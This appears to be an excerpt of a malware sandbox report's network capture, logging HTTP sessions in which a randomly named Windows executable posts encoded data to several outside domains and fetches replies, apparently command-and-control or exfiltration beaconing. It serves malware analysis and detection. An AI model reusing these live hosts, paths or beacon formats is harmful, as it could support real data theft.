cb 42 [TRUNCATED]
                                                              Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.449811217.160.0.113805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:11:07.625307083 CET10855OUTPOST /m5si/ HTTP/1.1
                                                              Host: www.prestigerugz.info
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 10305
                                                              Origin: http://www.prestigerugz.info
                                                              Referer: http://www.prestigerugz.info/m5si/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2f 61 38 62 53 68 71 4b 4f 51 73 61 7a 74 54 4b 41 46 79 57 48 37 33 34 5a 4b 78 63 48 30 6d 39 4a 6b 71 50 50 42 4a 53 6f 50 57 65 6a 7a 52 68 4b 33 49 37 70 71 76 49 72 68 66 6c 44 6f 66 4c 4f 70 32 61 6c 63 63 76 78 6b 2f 35 74 6a 2f 49 74 76 53 71 79 63 42 6b 70 6c 41 77 73 55 68 59 38 69 4b 36 6b 39 77 7a 4f 76 6e 43 6d 34 32 32 63 4f 35 42 76 47 76 4e 30 79 7a 59 31 54 48 37 63 50 56 39 41 34 4d 42 4d 42 4f 47 39 69 62 74 34 6c 53 52 7a 43 7a 52 4e 66 36 2b 2b 54 64 4e 62 66 6b 4c 36 73 72 76 41 71 4b 58 6c 77 2b 50 50 58 74 74 4a 74 5a 50 46 70 58 57 30 66 4e 47 42 30 32 49 67 47 32 48 5a 31 51 61 35 4b 73 44 62 79 61 46 35 61 53 54 2f 74 2f 76 6d 55 6e 7a 65 39 44 38 53 2f 61 78 35 75 33 2f 76 68 52 63 78 42 4f 34 4a 53 6c 7a 5a 48 6d 59 34 45 78 4c 4a 4b 6f 46 4c 6f 68 51 67 72 75 49 4c 4d 2f 35 73 49 32 67 4a 68 45 78 6a 2b 32 6e 2f 4d 30 7a 7a 4b 66 75 68 76 76 48 5a 73 4e 6d 4c 79 62 62 33 52 74 78 6f 41 57 53 48 53 2b 6d 78 [TRUNCATED]
                                                              Data Ascii: X25tIdT0=TowXiW7yiZaI/a8bShqKOQsaztTKAFyWH734ZKxcH0m9JkqPPBJSoPWejzRhK3I7pqvIrhflDofLOp2alccvxk/5tj/ItvSqycBkplAwsUhY8iK6k9wzOvnCm422cO5BvGvN0yzY1TH7cPV9A4MBMBOG9ibt4lSRzCzRNf6++TdNbfkL6srvAqKXlw+PPXttJtZPFpXW0fNGB02IgG2HZ1Qa5KsDbyaF5aST/t/vmUnze9D8S/ax5u3/vhRcxBO4JSlzZHmY4ExLJKoFLohQgruILM/5sI2gJhExj+2n/M0zzKfuhvvHZsNmLybb3RtxoAWSHS+mxGt4EgngWEVwIjwKXdgvaeZaSU9J/KUGqwokiZmGJlJ4eDRQ8rSd94L0O86tUpiNiw2bomLWD6Xg33XdMNSawJcFQLp4vwyXfXej9mU88oJ/CNb7k1G8/CjH7GOW0nvWiAOB4h6dYAbvu9TPbchNDbZb0P2AtfFWWNbfeq002lr0GFu7o9NrgeJuDd8m+moseykbAv9EMdu/ovCVd9ocnlFetidSH1TsDLbW34QoJM5ql8hovVThW/p0z93cw3f+/vENxxfQ3WMtHRXknAMNyKAXxHa1jxpLwfgXv5/nAMNEno27WsjqjiIeVz1oJDUOJjcY/PzTZdWfcgz+aiJlqX6eWuMfVD9gTLuvnTGHJB3CEmYXm6sOkneUEA2S7gAqN6+64wrPeewJGOK2cU4EIa9Y40E54NjNZNzo9QEP2YbrpXhxz0BGwnJr4lZq3DIeJyKl44iS0Osi9Lts7FXspLQCfMX6voZDUkczprT9X3cGG0DDG7MqOcV7c89gc2JNhFqZJNXeahJpYfXFdOy1I/gyoDmguFfFZhRRb8FQqaj5goKlcHmJ73+rdaXmJUdTAtkU503M1pEY57pl2NMgrL3FNCLKC4Os6YqJ2aHetBHlnwkU9m8kofs5PWa+M6oZdmVZ1p2x+mfJLJGmhnF/aok0zy2MMdtAGKi [TRUNCATED]
                                                              Dec 9, 2024 09:11:08.903601885 CET780INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Date: Mon, 09 Dec 2024 08:11:08 GMT
                                                              Server: Apache
                                                              X-Frame-Options: deny
                                                              Content-Encoding: gzip
                                                              Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                              Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.449818217.160.0.113805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:11:10.285001040 CET480OUTGET /m5si/?X25tIdT0=eqY3hh7t27bJ5LQfUACiIBop+4++C12UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcnk3D3+1Po89+p2utRtVEn8mZesTWlz/QNOcc=&_PMl3=z6VH1Hp8JH HTTP/1.1
                                                              Host: www.prestigerugz.info
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Dec 9, 2024 09:11:11.632448912 CET1236INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Content-Length: 1271
                                                              Connection: close
                                                              Date: Mon, 09 Dec 2024 08:11:11 GMT
                                                              Server: Apache
                                                              X-Frame-Options: deny
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                              Dec 9, 2024 09:11:11.632467985 CET203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 4b 27 0a
                                                              Data Ascii: + window.location.host + '/' + 'IONOSParkingUK' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.449858154.90.58.209805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:11:27.138220072 CET738OUTPOST /521z/ HTTP/1.1
                                                              Host: www.jijievo.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 205
                                                              Origin: http://www.jijievo.site
                                                              Referer: http://www.jijievo.site/521z/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 37 48 2b 41 67 72 57 45 6d 38 79 2b 69 68 56 6f 35 51 61 2f 2b 65 63 36 73 51 6a 46 51 39 4e 6b 46 32 34 74 67 78 50 75 6f 79 50 78 46 74 34 4b 33 6c 42 73 32 6d 68 68 49 45 54 51 37 65 62 72 76 4a 48 34 42 59 73 55 4e 48 51 6f 48 59 2b 35 33 51 51 47 6c 51 7a 46 4b 74 61 7a 42 69 5a 4e 76 76 78 52 6f 34 78 77 4b 79 74 4a 63 43 74 35 36 7a 33 6f 6f 68 52 7a 46 5a 35 2f 2b 43 2b 45 35 56 6a 38 2b 66 58 52 41 54 4b 39 53 4c 39 45 7a 61 45 58 33 75 38 65 65 69 70 64 74 43 53 34 35 71 59 6b 36 35 6f 47 52 72 74 69 4f 38 4c 6a 48 32 74 6c 63 67 3d 3d
                                                              Data Ascii: X25tIdT0=Vzfg0MdIUfpb7H+AgrWEm8y+ihVo5Qa/+ec6sQjFQ9NkF24tgxPuoyPxFt4K3lBs2mhhIETQ7ebrvJH4BYsUNHQoHY+53QQGlQzFKtazBiZNvvxRo4xwKytJcCt56z3oohRzFZ5/+C+E5Vj8+fXRATK9SL9EzaEX3u8eeipdtCS45qYk65oGRrtiO8LjH2tlcg==
                                                              Dec 9, 2024 09:11:28.708869934 CET241INHTTP/1.1 200 OK
                                                              Content-Encoding: gzip
                                                              Content-Type: text/html; charset=UTF-8
                                                              Date: Mon, 09 Dec 2024 08:11:28 GMT
                                                              Server: nginx
                                                              Vary: Accept-Encoding
                                                              Content-Length: 44
                                                              Connection: close
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                              Data Ascii: KLIU(WHO-QHKM.g


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.449864154.90.58.209805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:11:29.806229115 CET758OUTPOST /521z/ HTTP/1.1
                                                              Host: www.jijievo.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 225
                                                              Origin: http://www.jijievo.site
                                                              Referer: http://www.jijievo.site/521z/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 36 6b 32 41 74 73 71 45 75 38 79 39 75 42 56 6f 77 77 61 37 2b 65 41 36 73 55 36 61 52 49 6c 6b 46 57 49 74 78 46 62 75 6c 53 50 78 4e 4e 34 50 7a 6c 42 6c 32 6d 74 44 49 41 50 51 37 65 50 72 76 4c 66 34 42 75 6b 56 4d 58 51 71 50 34 2b 37 36 77 51 47 6c 51 7a 46 4b 72 33 63 42 69 68 4e 75 66 42 52 70 61 5a 7a 57 43 74 49 55 69 74 35 73 7a 33 73 6f 68 51 6d 46 64 67 61 2b 41 57 45 35 58 72 38 2f 4f 58 53 4f 54 4b 37 64 72 38 4b 33 66 35 73 37 39 59 53 41 54 42 67 6c 6d 6d 44 78 4d 56 2b 72 49 4a 52 44 72 4a 52 54 37 43 58 4b 31 51 73 48 68 39 70 55 65 45 79 59 37 61 46 4e 77 65 58 53 6f 4c 76 55 5a 6f 3d
                                                              Data Ascii: X25tIdT0=Vzfg0MdIUfpb6k2AtsqEu8y9uBVowwa7+eA6sU6aRIlkFWItxFbulSPxNN4PzlBl2mtDIAPQ7ePrvLf4BukVMXQqP4+76wQGlQzFKr3cBihNufBRpaZzWCtIUit5sz3sohQmFdga+AWE5Xr8/OXSOTK7dr8K3f5s79YSATBglmmDxMV+rIJRDrJRT7CXK1QsHh9pUeEyY7aFNweXSoLvUZo=
                                                              Dec 9, 2024 09:11:31.386343956 CET241INHTTP/1.1 200 OK
                                                              Content-Encoding: gzip
                                                              Content-Type: text/html; charset=UTF-8
                                                              Date: Mon, 09 Dec 2024 08:11:31 GMT
                                                              Server: nginx
                                                              Vary: Accept-Encoding
                                                              Content-Length: 44
                                                              Connection: close
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
                                                              Data Ascii: KLIU(WHO-QHKM.g


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.449871154.90.58.209805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:11:32.464766026 CET10840OUTPOST /521z/ HTTP/1.1
                                                              Host: www.jijievo.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 10305
                                                              Origin: http://www.jijievo.site
                                                              Referer: http://www.jijievo.site/521z/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 56 7a 66 67 30 4d 64 49 55 66 70 62 36 6b 32 41 74 73 71 45 75 38 79 39 75 42 56 6f 77 77 61 37 2b 65 41 36 73 55 36 61 52 49 39 6b 45 6e 6f 74 6a 58 7a 75 6b 53 50 78 48 74 34 4f 7a 6c 41 33 32 6d 31 48 49 48 48 71 37 64 33 72 39 61 2f 34 48 63 4d 56 47 58 51 71 4e 34 2b 34 33 51 52 63 6c 51 6a 42 4b 74 58 63 42 69 68 4e 75 63 5a 52 74 49 78 7a 46 53 74 4a 63 43 74 31 36 7a 33 55 6f 68 59 32 46 64 74 76 2b 77 32 45 35 33 37 38 39 38 2f 53 43 54 4b 35 65 72 39 58 33 66 39 7a 37 39 46 68 41 54 46 4f 6c 68 4f 44 7a 64 6b 30 70 35 74 39 53 62 74 4f 49 34 36 71 4f 46 45 50 4a 77 6b 4a 61 4f 64 72 61 4b 79 38 4b 33 6e 4d 4b 59 2f 70 44 74 61 45 58 41 6a 37 46 35 42 2f 37 66 63 33 4f 32 62 43 31 78 77 73 2b 2f 39 45 70 33 36 47 4b 56 39 34 53 5a 68 4d 62 62 2b 48 77 66 58 4b 34 4b 57 6c 75 57 71 32 67 53 56 6a 48 30 36 2b 32 49 6a 51 66 6a 63 55 76 4a 2b 4a 73 30 52 56 69 51 66 79 62 52 2b 78 39 4e 49 4a 45 35 55 62 53 48 69 2b 54 57 67 37 35 68 4a 42 68 46 4d 7a 57 58 63 55 55 [TRUNCATED]
                                                              Data Ascii: X25tIdT0=Vzfg0MdIUfpb6k2AtsqEu8y9uBVowwa7+eA6sU6aRI9kEnotjXzukSPxHt4OzlA32m1HIHHq7d3r9a/4HcMVGXQqN4+43QRclQjBKtXcBihNucZRtIxzFStJcCt16z3UohY2Fdtv+w2E537898/SCTK5er9X3f9z79FhATFOlhODzdk0p5t9SbtOI46qOFEPJwkJaOdraKy8K3nMKY/pDtaEXAj7F5B/7fc3O2bC1xws+/9Ep36GKV94SZhMbb+HwfXK4KWluWq2gSVjH06+2IjQfjcUvJ+Js0RViQfybR+x9NIJE5UbSHi+TWg75hJBhFMzWXcUUoxVv0SoBKPHOg7XRY0HmYbvShfiG95/DVbsruQNblwGWBjVT7EM4wKd8pH3RiNcALO1Z6BE5Oyz3EYG1GcMqXisBm15DnNiTf3/udZRWa0eJKYihzKqdAPRDmbn2LUtZjZ1RVtyhsl1nECI3nckvbNqX/oNvcAEW3oz2MdkEYzQ2fGfVv/jQIfOaIK5doxLq7SDX6toRGlAHCowgSNwo3lrsxVAwVrssRFw55KAxg2r91Kds+zTDCv95XpwgN2VKFQYCuvbUInPNZF1geBkDCUaLba4ydvFjb3VThezroctjmZj4ARnzwS/vPxTXZ4/v3ES11fvpE8XXrDwxiqrR19D/k3jQB0U1jDTu+Iln+JCOrCcyGjXn1ayTGeFrOtDiwNCqaEK5oRi4uyLn8DStXpcPy9TtZxV/WgudA+TojLCyi+GVOywiG98EoQ+X3H81ngul2e2i5Xv1qWbjf0NgDy+q9X7hKuodRtLEHF9Q69HJRkmKNBY6C9jjF/01i6KOToXLhCfXnKXKNEPiJbkM0SyRfPYEp5gIQ2X2u/GShdsPXUWitg/JgmTC4EiDXB7G5npExLVr3GYisyk4pn4jNr3CGCJtLAiohm6/Vm/Nyh18K0OKkFnRja8b4KPWd6i7Zm9OA6R6uwetBuQBbh5gHKBaHyA2czucWn [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.449879154.90.58.209805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:11:35.131052971 CET475OUTGET /521z/?X25tIdT0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&_PMl3=z6VH1Hp8JH HTTP/1.1
                                                              Host: www.jijievo.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Dec 9, 2024 09:11:36.716455936 CET197INHTTP/1.1 200 OK
                                                              Content-Type: text/html; charset=UTF-8
                                                              Date: Mon, 09 Dec 2024 08:11:36 GMT
                                                              Server: nginx
                                                              Vary: Accept-Encoding
                                                              Content-Length: 24
                                                              Connection: close
                                                              Data Raw: 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                              Data Ascii: Unable to get connection


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.44989738.181.21.178805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:11:42.512797117 CET729OUTPOST /l9wb/ HTTP/1.1
                                                              Host: www.44ynh.top
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 205
                                                              Origin: http://www.44ynh.top
                                                              Referer: http://www.44ynh.top/l9wb/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 51 49 41 31 41 74 57 46 51 33 42 67 37 66 76 69 61 61 53 56 4e 54 56 6a 55 59 35 48 55 4a 5a 31 6b 75 31 31 55 6e 57 4d 47 68 59 78 43 78 2b 63 54 49 46 31 37 78 77 59 43 5a 6a 71 72 4a 61 67 4a 4d 70 52 63 76 39 66 64 62 59 71 45 4c 42 54 79 4d 4d 44 31 4c 32 35 78 39 70 33 6d 34 2b 48 36 4a 4e 61 34 77 69 51 57 64 47 73 62 78 4a 51 4b 62 4d 32 52 30 71 75 61 70 56 58 37 74 4c 4e 72 53 48 72 59 51 63 69 30 36 74 31 4e 74 4c 6b 63 32 52 4b 39 47 76 39 53 4d 33 44 56 62 6f 62 70 4c 4e 58 63 44 59 73 4a 47 39 65 73 73 6d 2f 65 34 43 48 6e 47 72 7a 4b 37 34 4a 31 6b 6a 70 74 41 3d 3d
                                                              Data Ascii: X25tIdT0=QIA1AtWFQ3Bg7fviaaSVNTVjUY5HUJZ1ku11UnWMGhYxCx+cTIF17xwYCZjqrJagJMpRcv9fdbYqELBTyMMD1L25x9p3m4+H6JNa4wiQWdGsbxJQKbM2R0quapVX7tLNrSHrYQci06t1NtLkc2RK9Gv9SM3DVbobpLNXcDYsJG9essm/e4CHnGrzK74J1kjptA==
                                                              Dec 9, 2024 09:11:44.001899004 CET302INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Dec 2024 08:11:43 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 138
                                                              Connection: close
                                                              ETag: "66df0ead-8a"
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.44990438.181.21.178805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:11:45.280826092 CET749OUTPOST /l9wb/ HTTP/1.1
                                                              Host: www.44ynh.top
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 225
                                                              Origin: http://www.44ynh.top
                                                              Referer: http://www.44ynh.top/l9wb/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 51 49 41 31 41 74 57 46 51 33 42 67 34 2f 2f 69 57 5a 71 56 4c 7a 56 6b 52 59 35 48 64 70 5a 78 6b 75 35 31 55 6d 53 69 46 55 77 78 46 54 32 63 51 4e 70 31 33 52 77 59 62 70 6a 76 6c 70 61 64 4a 4d 6b 69 63 75 78 66 64 66 77 71 45 4b 78 54 79 36 45 43 31 62 32 2f 6b 74 70 35 72 59 2b 48 36 4a 4e 61 34 77 6e 39 57 5a 53 73 62 46 31 51 4a 2b 73 33 59 55 71 70 4d 35 56 58 2f 74 4c 4a 72 53 48 56 59 56 31 2f 30 38 70 31 4e 6f 76 6b 64 6b 35 56 30 47 76 37 66 73 32 42 55 4f 46 54 73 6f 34 71 58 6a 45 71 4d 43 6c 2f 74 71 72 6c 50 4a 6a 51 31 47 50 41 58 38 78 39 34 6e 65 67 32 4e 35 34 6d 66 36 76 7a 69 51 63 6d 55 52 4c 68 73 31 71 62 7a 6f 3d
                                                              Data Ascii: X25tIdT0=QIA1AtWFQ3Bg4//iWZqVLzVkRY5HdpZxku51UmSiFUwxFT2cQNp13RwYbpjvlpadJMkicuxfdfwqEKxTy6EC1b2/ktp5rY+H6JNa4wn9WZSsbF1QJ+s3YUqpM5VX/tLJrSHVYV1/08p1Novkdk5V0Gv7fs2BUOFTso4qXjEqMCl/tqrlPJjQ1GPAX8x94neg2N54mf6vziQcmURLhs1qbzo=
                                                              Dec 9, 2024 09:11:46.696757078 CET302INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Dec 2024 08:11:46 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 138
                                                              Connection: close
                                                              ETag: "66df0ead-8a"
